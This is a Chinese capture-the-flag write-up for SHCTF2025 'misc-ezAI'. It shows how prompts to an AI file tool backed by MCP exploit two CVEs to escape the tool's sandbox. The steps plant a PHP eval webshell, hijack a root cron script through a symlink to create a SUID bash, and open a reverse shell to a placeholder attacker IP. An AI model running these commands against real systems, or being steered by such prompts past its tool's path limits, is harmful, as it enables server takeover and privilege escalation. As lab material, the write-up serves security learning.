SHCTF2025 misc-ezAI

SHCTF2025 misc-ezAI

Aristore

本题考点:

视频 WriteUp

信息收集 #1

SHCTF2025_ezAI-1

探测发现沙箱位于 /var/www/h

猜测 Web 根目录位于常见的 /var/www/html

CVE-2025-53109

尝试查看 /var/www/html 有什么文件

1
当前位于哪个目录下
1
/var/www/html下面有什么

SHCTF2025_ezAI-2

这证实了存在漏洞 CVE-2025-53109,也探测出了后端是 php

写入一句话木马

1
给/var/www/html/shell.php写入<?php @eval($_POST['c']); ?>

SHCTF2025_ezAI-3

直接拿蚁剑连接

SHCTF2025_ezAI-4

信息收集 #2

SHCTF2025_ezAI-5

查看用户组信息,发现用户组 mcp

1
getent group

查找属于 mcp 组的文件

1
find / -group mcp -ls 2>/dev/null | grep 'root'

SHCTF2025_ezAI-6

sessionclean 很可能是提权点

CVE-2025-53110

利用 webshell 在 Web 目录下创建一个指向 sessionclean 的软链接

1
ln -s /usr/lib/php/sessionclean /var/www/html/pwn

指示 MCP 向软链接 /var/www/html/pwn 写入恶意 Payload 覆盖 sessionclean

1
2
3
4
往文件/var/www/html/pwn写入以下内容:
#!/bin/bash
cp /bin/bash /var/www/html/rootbash
chmod +xs /var/www/html/rootbash

SHCTF2025_ezAI-7

等待 Cron 守护进程下一次唤醒(0-60秒),root 用户执行被篡改的脚本,生成了带有 SUID 位的 Bash

验证一下:

SHCTF2025_ezAI-8

获取 flag

解法 1 - 反弹 shell

在攻击机监听:

1
nc -lvvp 1337

在 webshell 执行:

1
bash -c 'bash -i >& /dev/tcp/<ATTACKER_IP>/1337 0>&1'

SHCTF2025_ezAI-9

SHCTF2025_ezAI-10

利用 rootbash 提权(-p (privileged) 参数用于保留 euid=0)

1
./rootbash -p

SHCTF2025_ezAI-11

解法 2 - 直接利用 rootbash 读取 flag 文件

ls -la /root

1
2
3
4
5
6
7
8
9
10
11
(www-data:/var/www/html) $ echo bHMgLWxhIC9yb290 | base64 -d | ./rootbash -p
total 36
drwx------ 1 root root 4096 Dec 1 16:32 .
drwxr-xr-x 1 root root 4096 Dec 1 17:12 ..
-rw-r--r-- 1 root root 3106 Apr 22 2024 .bashrc
drwxr-xr-x 4 root root 4096 Dec 1 03:25 .npm
-rw-r--r-- 1 root root 161 Apr 22 2024 .profile
drwx------ 2 root root 4096 Nov 30 16:19 .ssh
-r-------- 1 root root 41 Dec 1 16:32 7h3_Tru3_53cret_!$_H!dden_W17#!n_T#15_F1le
-rw-r--r-- 1 root root 98 Dec 1 16:32 flag
-rw-r--r-- 1 root root 98 Dec 1 16:32 flag.txt

cat /root/'7h3_Tru3_53cret_!$_H!dden_W17#!n_T#15_F1le'

1
2
(www-data:/var/www/html) $ echo Y2F0IC9yb290Lyc3aDNfVHJ1M181M2NyZXRfISRfSCFkZGVuX1cxNyMhbl9UIzE1X0YxbGUn | base64 -d | ./rootbash -p
flag{...}
  • 标题: SHCTF2025 misc-ezAI
  • 作者: Aristore
  • 链接: https://www.aristore.top/posts/SHCTF2025_ezAI/
  • 版权声明: 版权所有 © Aristore,禁止转载。
评论